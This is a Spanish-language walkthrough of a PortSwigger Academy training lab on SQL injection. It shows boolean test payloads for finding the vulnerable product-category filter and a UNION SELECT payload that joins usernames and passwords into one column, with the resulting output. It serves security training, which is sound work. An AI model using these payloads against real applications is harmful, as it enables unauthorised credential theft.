# Lab: SQL injection UNION attack, retrieving multiple values in a single column ## Información del laboratorio En este laboratorio hay una vulnerabilidad de inyección SQL en el filtro de la categoría del producto. Esta vulnerabilidad es similar a las de los laboratorios: * [lab-sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query](https://www.xtormin.com/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query "mention") * [lab-sql-injection-union-attack-finding-a-column-containing-text](https://www.xtormin.com/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-finding-a-column-containing-text "mention") * [lab-sql-injection-union-attack-retrieving-data-from-other-tables](https://www.xtormin.com/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-data-from-other-tables "mention") ## Flujo de explotación ### Identificación del parámetro vulnerable Para verificar que es vulnerable, se usan payloads con el operador lógico AND, por ejemplo: `'and'1337'='1337` y `'and'1337'='1338`. Se identifica de la misma forma que el laboratorio: [lab-sql-injection-union-attack-retrieving-data-from-other-tables](https://www.xtormin.com/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-data-from-other-tables "mention") ### Obtención de usuarios y contraseñas en una misma columna ```sql '+UNION+SELECT+NULL,username||'~'||password+FROM+users-- ```

Como se puede observar, en la segunda columna se muestra el valor de ambas columnas: ``` username~password ```